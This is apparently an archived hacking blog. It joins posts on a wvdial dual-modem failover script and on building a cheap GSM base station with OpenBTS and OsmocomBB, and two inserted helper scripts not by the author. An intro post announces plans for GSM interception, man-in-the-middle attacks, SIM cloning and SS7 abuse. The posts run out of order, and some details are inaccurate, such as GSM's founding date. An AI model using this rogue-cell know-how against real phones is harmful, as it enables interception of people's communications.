    ttyACM2<*1>: Speed 230400: AT -- OK
    ttyACM2<*1>: Speed 460800: AT -- OK
    ttyACM2<*1>: Max speed is 460800; that should be safe.
    ttyACM2<*1>: ATQ0 V1 E1 S0=0 &C1 &D2 +FCLASS=0 -- OK
    ttyUSB0<*1>: ATQ0 V1 E1 -- OK
    ttyUSB0<*1>: ATQ0 V1 E1 Z -- OK
    ttyUSB0<*1>: ATQ0 V1 E1 S0=0 -- OK
    ttyUSB0<*1>: ATQ0 V1 E1 S0=0 &C1 -- OK
    ttyUSB0<*1>: ATQ0 V1 E1 S0=0 &C1 &D2 -- OK
    ttyUSB0<*1>: ATQ0 V1 E1 S0=0 &C1 &D2 +FCLASS=0 -- OK
    ttyUSB0<*1>: Modem Identifier: ATI -- Manufacturer: +GMI: HUAWEI TECHNOLOGIES CO., LTD
    ttyUSB0<*1>: Speed 9600: AT -- OK
    ttyUSB0<*1>: Max speed is 9600; that should be safe.
    ttyUSB0<*1>: ATQ0 V1 E1 S0=0 &C1 &D2 +FCLASS=0 -- OK
    ttyUSB1<*1>: ATQ0 V1 E1 -- failed with 2400 baud, next try: 9600 baud
    ttyUSB1<*1>: ATQ0 V1 E1 -- failed with 9600 baud, next try: 9600 baud
    ttyUSB1<*1>: ATQ0 V1 E1 -- and failed too at 115200, giving up.
    ttyUSB2<*1>: ATQ0 V1 E1 -- OK
    ttyUSB2<*1>: ATQ0 V1 E1 Z -- OK
    ttyUSB2<*1>: ATQ0 V1 E1 S0=0 -- OK
    ttyUSB2<*1>: ATQ0 V1 E1 S0=0 &C1 -- OK
    ttyUSB2<*1>: ATQ0 V1 E1 S0=0 &C1 &D2 -- OK
    ttyUSB2<*1>: ATQ0 V1 E1 S0=0 &C1 &D2 +FCLASS=0 -- OK
    ttyUSB2<*1>: Modem Identifier: ATI -- Manufacturer: +GMI: HUAWEI TECHNOLOGIES CO., LTD
    ttyUSB2<*1>: Speed 9600: AT -- OK
    ttyUSB2<*1>: Max speed is 9600; that should be safe.
    ttyUSB2<*1>: ATQ0 V1 E1 S0=0 &C1 &D2 +FCLASS=0 -- OK

    Found an USB modem on /dev/ttyACM0.
    Modem configuration written to /etc/wvdial.conf.
    ttyACM0<Info>: Speed 460800; init "ATQ0 V1 E1 S0=0 &C1 &D2 +FCLASS=0"
    ttyACM1<Info>: Speed 460800; init "ATQ0 V1 E1 S0=0 &C1 &D2 +FCLASS=0"
    ttyACM2<Info>: Speed 460800; init "ATQ0 V1 E1 S0=0 &C1 &D2 +FCLASS=0"
    ttyUSB0<Info>: Speed 9600; init "ATQ0 V1 E1 S0=0 &C1 &D2 +FCLASS=0"
    ttyUSB2<Info>: Speed 9600; init "ATQ0 V1 E1 S0=0 &C1 &D2 +FCLASS=0"
As you can see, it did find two modems. Ignore the MF192 entries you see; it is a GSM modem I was using to illustrate this. Again, wvdialconf reports that only one modem was found (on /dev/ttyACM0), but according to the terminal output there are clearly two: one on ttyUSB0 (the Huawei) and one on ttyACM0. With that said...
Let's go... save another config file, /etc/wvdial2.conf, pointing at the second modem device, edit the required parts, and finally set it out to roll.
now the script.
#!/bin/sh
# Pick the ppp interface with the best ping to 8.8.8.8 and make it the default route.
modem_route=$(
    for iface in `ifconfig -a | grep ppp | awk '{print $1; }'`; do
        # one quiet ping per interface; print "iface = avg_rtt_ms" (the avg is empty if the ping failed)
        echo $iface = `ping -I $iface -c 1 -q 8.8.8.8 | grep avg | awk -F/ '{print $5;}'`
    done | awk 'NF == 3' | sort -k 3 -n | head -n 1
    # awk 'NF == 3' drops interfaces whose ping failed; sort -n keeps the lowest avg RTT first
)
logger "Setting new route from candidate: $modem_route"
ip route del default
ip route add default dev `echo $modem_route | awk '{print $1;}'`
This pings Google's DNS server over each modem to measure latency (and detect a disconnection) from the ping round-trip time, and then changes the default route between the two modem links, as you can see in the last two lines.
Next, dial both modems. This is done with the following commands:
sudo wvdial -C /etc/wvdial.conf
^ dials the first modem
sudo wvdial -C /etc/wvdial2.conf
^ dials the second modem
Oh, and run a cron job to call the script every... I don't know. People say cron jobs can't run every second, but hey... people also say hacking is hard :)
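The same procedure (deriving the second wvdial configuration from the first, then choosing the link with the lowest ping round-trip time and installing it as the default route) as an added example that is not the blog's own script. The function names, the ping summary lines and the interface names ppp0..ppp2 are constructed for this page; only `measure_links` and `set_default_route` touch a real system, the rest runs offline:

```shell
#!/bin/sh
# Added example (not the blog's script). Assumed names: make_second_conf,
# avg_rtt, pick_best_link, measure_links, set_default_route and the sample
# data below are all constructed for this page.

# make_second_conf DEVICE: read the first wvdial config on stdin and emit a
# copy whose "Modem = ..." line points at DEVICE. Usage:
#   make_second_conf /dev/ttyUSB0 < /etc/wvdial.conf > /etc/wvdial2.conf
make_second_conf() {
    sed "s|^[[:space:]]*Modem[[:space:]]*=.*|Modem = $1|"
}

# avg_rtt LINE: extract the average RTT in ms from a ping summary line such as
#   rtt min/avg/max/mdev = 41.210/43.100/45.000/1.200 ms
# (field 5 when split on "/"). Prints nothing if LINE is not a summary line,
# which is what a failed ping leaves us with.
avg_rtt() {
    printf '%s\n' "$1" | awk -F/ '/avg/ { print $5 }'
}

# pick_best_link: read "iface avg_ms" lines on stdin and print the interface
# with the lowest average RTT. Lines with no measurement (the ping failed) have
# only one field and are dropped first, so a dead modem can never be chosen.
pick_best_link() {
    awk 'NF == 2 { print $2, $1 }' | sort -n | head -n 1 | awk '{ print $2 }'
}

# measure_links: live probe (needs pppN interfaces and connectivity; not used
# by the offline demo). Emits one "iface avg_ms" line per ppp interface.
measure_links() {
    for iface in $(ip -o link show | awk -F': ' '/ppp/ { print $2 }'); do
        rtt=$(ping -I "$iface" -c 1 -W 2 -q 8.8.8.8 2>/dev/null \
              | awk -F/ '/avg/ { print $5 }')
        printf '%s %s\n' "$iface" "$rtt"
    done
}

# set_default_route IFACE: swap the default route in one step instead of
# "del" followed by "add", so there is no window with no default route at all.
set_default_route() {
    logger "Setting default route via $1"
    ip route replace default dev "$1"
}

# sample_measurements: constructed results of three probes. ppp2's ping failed,
# so it yields an error line instead of a summary and ends up with no value.
sample_measurements() {
    printf '%s %s\n' ppp0 "$(avg_rtt 'rtt min/avg/max/mdev = 41.210/41.210/41.210/0.000 ms')"
    printf '%s %s\n' ppp1 "$(avg_rtt 'rtt min/avg/max/mdev = 18.905/18.905/18.905/0.000 ms')"
    printf '%s %s\n' ppp2 "$(avg_rtt 'ping: sendmsg: Network is unreachable')"
}

# Offline demo when run as "sh script.sh demo": prints the interface the
# constructed sample selects (ppp1, the lowest RTT among the links that answered).
if [ "${1:-}" = "demo" ]; then
    sample_measurements | pick_best_link
fi
```

To use it live, replace `sample_measurements` with `measure_links` and pass the result to `set_default_route`; the only behavioural difference from the blog's one-liner is that a link whose ping failed is excluded instead of being sorted to the bottom, and the lowest latency wins rather than the highest.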
With that said... more configuration can be done to get a smoother flow on the internet, for things like streaming media, and to make sure traffic meant for a specific device passes through unchanged :)
Do I need to go deeper than this? Sure... but come on, should I do all this for you?
If yes... wait for it... THIS IS FOR EDUCATIONAL PURPOSES ONLY: how to configure routes.
It sorta looks like this now, huh:
                     +-----------+
             if1 ----|  Modem 1  |----+
             |       +-----------+    |
YoBox --- Script                      +--- Internet
             |       +-----------+    |
             if2 ----|  Modem 2  |----+
                     +-----------+
OsmocomBB+OpenBTS+GSM={Calypso Chipset/Motorola C123} *USB+2.5mm Jack
BTS------------Base Transceiver Station
GSM-----------Global System for Mobile Communications, originally Group Spécial Mobile
OsmocomBB---Firmware to run in our Calypso Based Device (Motorola C123)
USB to 2.5mm Jack cable (I will show you how to make this)
autoconf
libtool
libosip2
libortp
libusb-1.0
g++
sqlite3
libsqlite3-dev (sipauthserve only)
libreadline6-dev
libncurses5-dev
sudo apt-get install autoconf libtool libosip2-dev libortp-dev libusb-1.0-0-dev g++ sqlite3 libsqlite3-dev erlang libreadline6-dev libncurses5-dev
sudo dpkg -i a53_1.0-1_amd64.deb
And if you scan for GSM networks on your phone, you should see a 00101 (test) network. If you try to attach, it will reject you. This is because OpenBTS, by default, only allows registered handsets to connect; as we are not running our registration server (sipauthserve), no phones will camp. From here, we should look at a few OpenBTS configuration variables. Connect to OpenBTS with the OpenBTSCLI command:
(from OpenBTS root)
Warning: Only set GSM.Radio.C0 to an ARFCN you have a valid license for.
- What I am doing.
- What are my objectives.
- Why the above equipment.
- Why am I doing this.
- What do I get out of this.
What I am doing
I will be creating a BTS with the cheapest hardware equipment available to do this.
What are my objectives
Read above and then think of what a BTS can do.
Why the above Equipment
- Ummmm, coz it's really cheap (the equipment)
- Coz I want a BTS really bad (the things you can exploit/research with this)
- Coz testing IPv4/IPv6/TCP..... is too overrated and everyone is doing it... who will do GSM
Why am I doing this (now am just repeating myself)
What do I get out of this
Everything and nothing ----> yes, it's every bit of knowledge up to where I stop, and it's nothing since I know telcos will probably ignore my rant :(
..... ok lets get rolling.
REQUIREMENTS:
Hardware:
- PC
- Calypso Chipset Supported Device (Motorola c113,c115,118.....)
- USB to 2.5mm Jack cable
Software:
- *nix Based OS
- OsmocomBB
- OpenBTS
STEPS
- Install OpenBTS (and Asterisk)
- Install OsmocomBB
- Configure Everything
- Create the USB to 2.5 mm jack cable* (I am not going to go into this.... it's a pain I don't want to remember; not that it's very hard... it's just that I burnt a finger, and probably someone's house, while at it)
- Test
- and......play
- Install OpenBTS (and Asterisk)
Well, there are many ways to do this, from compiling the source to using the Debian packages that exist for this if you have Ubuntu 12.04 on x86-64 as your OS (I did this also on Debian 7.3 (wheezy) 64-bit). You also need to install these first:
libtool
libosip2
libortp
libusb-1.0
g++
sqlite3
libsqlite3-dev (sipauthserve only)
libreadline6-dev
libncurses5-dev
Well, after that the following downloaded packages need to be installed (N.B. the packages you are about to install are specific to UHD (USRP Hardware Driver) devices):
sudo dpkg -i openbts-public_3.2_amd64.deb
sudo dpkg -i smqueue-public_3.2_amd64.deb
sudo dpkg -i sipauthserve-public_3.2_amd64.deb
Running OpenBTS
(from OpenBTS root)
cd /OpenBTS
sudo ./OpenBTS
system ready
use the OpenBTSCLI utility to access CLI
You should see something like this..... well, if you have your devices connected and configured. Then use the OpenBTSCLI utility to access the CLI:
cd /OpenBTS
sudo ./OpenBTSCLI
Once you have OpenBTS up and running, you need to change the following configuration parameters in the database (/etc/OpenBTS/OpenBTS.db):
Control.GSMTAP.TargetIP = 127.0.0.1
GSM.Radio.NeedBSIC = 1
GSM.Radio.Band = 1800
GSM.CellSelection.Neighbors = (set to empty string)
GSM.RACH.MaxRetrans = 3
GSM.RACH.TxInteger = 8
GSM.Radio.C0 = <your ARFCN (see note)>
Control.LUR.OpenRegistration = ^63905.*$
(note: in this example only IMSIs with MCC 639 and MNC 05 will be allowed to register to the network; change that accordingly)
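The Control.LUR.OpenRegistration value above is the one setting that decides which handsets a lab cell will accept, so it is worth checking it before the radio comes up: a pattern that is too loose admits phones that are not yours. The following is an added example, not OpenBTS code or the blog's own; the function names, the "own" IMSI (MCC 639, MNC 05, as in the page's example) and the foreign probe IMSIs are constructed for this page. It only assumes, as the page does, that OpenBTS applies the value as a regular expression to each registering IMSI:

```shell
#!/bin/sh
# Added example (not OpenBTS code). Assumed names: lur_admits, audit_lur,
# scoped_lur and the probe IMSIs below are constructed for this page.

# lur_admits PATTERN IMSI: succeed if PATTERN matches IMSI as an extended
# regular expression, which is how the page describes OpenBTS using it.
lur_admits() {
    printf '%s\n' "$2" | grep -Eq -e "$1"
}

# scoped_lur MCC MNC: build an anchored pattern that admits only IMSIs of one
# PLMN (MCC+MNC followed by a 9- or 10-digit MSIN), e.g. ^63905[0-9]{9,10}$
scoped_lur() {
    printf '^%s%s[0-9]{9,10}$\n' "$1" "$2"
}

# audit_lur PATTERN: classify a candidate OpenRegistration pattern by testing
# it against one IMSI from the lab's own PLMN and three from unrelated PLMNs.
# Prints exactly one of:
#   rejects-own  the pattern would not even admit the lab's own test SIM
#   open         admits every probe IMSI (".*"-style, admits anyone nearby)
#   broad        admits some IMSIs outside the intended PLMN
#   scoped       admits only the intended PLMN
audit_lur() {
    pattern=$1
    # Constructed probes: own = MCC 639 MNC 05 (the page's example);
    # foreign = MCC 310 MNC 260, MCC 262 MNC 01, and the 001/01 test PLMN.
    own=639051234567890
    foreign="310260123456789 262011234567890 001010000000001"

    if ! lur_admits "$pattern" "$own"; then
        echo rejects-own
        return 0
    fi

    hits=0
    for imsi in $foreign; do
        if lur_admits "$pattern" "$imsi"; then
            hits=$((hits + 1))
        fi
    done

    if [ "$hits" -eq 3 ]; then
        echo open
    elif [ "$hits" -gt 0 ]; then
        echo broad
    else
        echo scoped
    fi
}

# Run as "sh audit.sh PATTERN" to classify a pattern before writing it into
# OpenBTS.db; with no argument it audits the page's example pattern.
if [ -n "${1:-}" ]; then
    audit_lur "$1"
elif [ "${0##*/}" = "audit.sh" ]; then
    audit_lur '^63905.*$'
fi
```

The page's `^63905.*$` comes back as `scoped`; a bare `.*` comes back as `open`, which is the case to refuse on a cell that is actually radiating.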
Installing OsmocomBB
This part is really fun but also very tricky, especially if you don't have an ARM cross-compiler (this lets us compile the ARM code into the firmware that gets loaded into the Calypso-based device, i.e. the Motorola C123), so here is a good place to start:
I'm guessing you have done the necessary. Many people ask me where the USB to 2.5 mm cable is available for purchase, and I would say here.
Now that we have nearly everything done, play around with Osmocom if it's your first time.... Clearly, if you need to know what it does, I would suggest you go to my PDFs link and get more info on 2G networks before doing anything past this point.
Now.... this is how to work a BTS from the cheap device.....
P.S. You need to do a filter replacement, and in case you destroy your board like I also did, you will need to do this (look at the photo):
"When attempting this for the first try, I soldered / desoldered components a few times and ended up destroying the pads and traces so much that there was no way I could put the original filters or balun back on the PCB.
So in a last attempt to make the phone do something, I tried something a little unorthodox (actually proposed by h0rizon on IRC :). Instead of doing a proper unbalanced to balanced signal conversion, I just connected one of the RITA balanced lines to the ground using a DC blocking cap. And then connected the other balanced line to the input via a capacitor as well. For DCS1800 you need to add a capacitor of your own, but for EGSM, there is a capacitor in the input SAW matching that does the trick so you only need a wire.
The quite dirty result is shown on the side. It's ugly but it actually works ... The signal is maybe distorted or a little more noisy, that has yet to be determined. So if you screw up, you can always fall back to this :)
" cited from http://246tnt.com/gsm/rx_filter.html
RF-hacking.... Yes Radio Frequency SPECIFICALLY, GSM
So do I start with explaining every single bit? because this is one hell of a lengthy topic.
OK lets start here:
GSM:
Most common network/protocol in the mobile industry (around 75% of mobile users)
Established around 1999
Very common
(was/is) Very Expensive Debugging devices
(had) Very little Documentation
Equipment:
MS-----------Mobile Station=Mobile Equipment + Sim Card
BTS----------Base Transmission Station
BSC----------Base Station Controller
here is a basic illustration of the GSM network
So with this we have a huge playing field. I know this is rather new to many people, and since GSM was a very hushed-up project the documentation available is either too heavy for people to indulge in or too undetailed, so starting off from the really simple works out there I will try to bridge these lines the best way I can.
So my next post will explain how to do "DEBUGGING" on this network with very simple, easy-to-afford tools (note: afford, not get).
Here are the things that we can achieve as of now.
Access the air interface between the phone and BTS
Access HLR via SS7 hacks and pay services (later on)
So what will we learn from all this:
- HOW IN/SECURE GSM NETWORKS REALLY ARE
- HOW TO BREAK THIS SECURITY
- HOW TO DO MAN IN THE MIDDLE ATTACKS ON THIS NETWORKS
- HOW TO INTERCEPT DATA ON THIS NETWORKS
- HOW TO SETUP BASE TRANSMISSION STATIONS
- HOW TO ACCESS SIM APPLICATIONS
- HOW TO CLONE/HACK SIM CARDS
- HOW TO CREATE OUR OWN GSM NETWORKS COMPLETE WITH :
- Personalised simcards
- sim applications
- secure network rules and protocols
- effective services
- really cheap call rates (i know i will probably be killed for this so if you dont hear from me... ahem)
So with that... why dont we dive in..... start from the next post about the debugging devices.
ARCHIVED
:) No longer posting, all articles should be treated as archived and outdated